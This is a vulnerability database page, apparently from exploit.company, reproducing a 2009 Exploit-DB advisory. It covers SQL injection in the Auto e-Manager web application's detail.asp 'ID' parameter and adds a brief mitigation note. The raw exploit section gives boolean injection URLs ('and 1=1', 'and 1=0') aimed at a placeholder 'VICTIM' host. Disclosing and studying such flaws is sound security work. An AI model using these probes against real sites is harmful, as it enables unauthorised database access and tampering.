Auto e-Manager - exploit.company

vendor:

Auto e-Manager

by:

KnocKout

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Auto e-Manager

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Auto e-Manager <= SQL Injection Vulnerability

Auto e-Manager is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'ID' parameter in the 'detail.asp' page. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This can be used to access or modify data in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user input and escape special characters.

Source

Exploit-DB raw data:

==================================================
Auto e-Manager <= SQL Injection Vulnerability
==================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
           { H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Auto e-Manager
~Software: http://www.site2nite.com/
~Vulnerability Style : SQL Injection

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
    ~~~~~~~~ Explotation~~~~~~~~~~~
    
   http://VICTIM/www/detail.asp?ID=654 {SQL Injection}
   http://VICTIM/www/detail.asp?ID=654 and 1=1  {True}
   http://VICTIM/www/detail.asp?ID=654 and 1=0  {False}
   
    ================================

     GoodLuck.